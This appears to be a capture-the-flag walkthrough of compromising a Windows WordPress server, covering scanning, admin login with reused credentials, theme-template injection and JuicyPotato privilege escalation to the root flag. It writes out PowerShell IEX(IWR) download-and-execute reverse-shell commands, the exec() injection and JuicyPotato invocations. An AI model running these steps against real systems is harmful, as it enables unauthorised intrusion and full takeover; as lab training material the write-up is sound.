- scan top 1000 ports
- the result
nmap -sC -sV -oN nmap/initial
- scan all ports
- the result
nmap -sC -sV -p- -oN nmap/all_ports
- all scan still the same
- open ports
- 80 / http
- 3306 / mysql
- Just default windows server page
- Using gobuster to find any hidden directory
- the result
- the result show this server have
install - as we know, the wordpress login path is
- let’s take a look
Admin Login
- Try to login as admin with credentials from previous box
- Success
Foothold/Gaining Access
WordPress Theme Injection
- Let’s try get the reverse shell by injected the theme
- I’m gonna use this theme “GutenBooster”
- and the shell I’m gonna use Nishang
- Now, I’m gonna put command in the
. - Which is a 404 template
- Source
exec('powershell IEX(IWR -UseBasicParsing)')
- This command will download the reverse shell and execute it
- Well, the reverse shell is succefully execute
everytime you’ve got
powershell reverse shell
make sure to run
whoami /all
The result
- Looks like
SeImpersonatePrivilege is enable
- We can privesc by using
juicy potato
- Source
- download the binary into
local machine
. Then, upload intovictim machine
- via this command
IWR -outfile again_gimme.exe
- then run the binary.
- the result
Privilege Escalation
- First, I’m gonna make
file with powershell command on it. - I’m called the file
- the command:
- Source
powershell "(IEX(IWR -UseBasicParsing))"
I’m gonna run
again with this flag:./again_gimme.exe -t * -p yo_my.bat -l 9902
the result
- it is failed but we can try with more
- Source
- before we start using the CLSID. We’re need to know what type of
OS version
this machine running on - by using this command:
(Get-WmiObject Win32_OperatingSystem).Caption
- the result
- Now, we’re need to pick Windows Server 2016 Standard CLSID
- I’m gonna try with
wpnservice CLSID
- I’m gonna run this command
.\again_gimme.exe -t * -p yo_my.bat -l 9902 -c '{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}'
Make sure you’re running the nc
for listening the connection REMEMBER: The powershell command in the bat file
was downloading another reverse shell file called rev.ps1
in that file. I’m listening on 9901. If you listen on the other port. Just change the port on that file.
- the result
- we’ve got the root flag
I’ve learned a lot today. Do not put any credentials on the exposure machine to the hacker or non-secure machine. Even tho it’s happened, quickly change the password. I’m also introducing a bunch of tools for windows pentest/hack. Lastly, always update and patch the machine.
I have a fun time doing this machine and I hope you guys do too. Bye ;)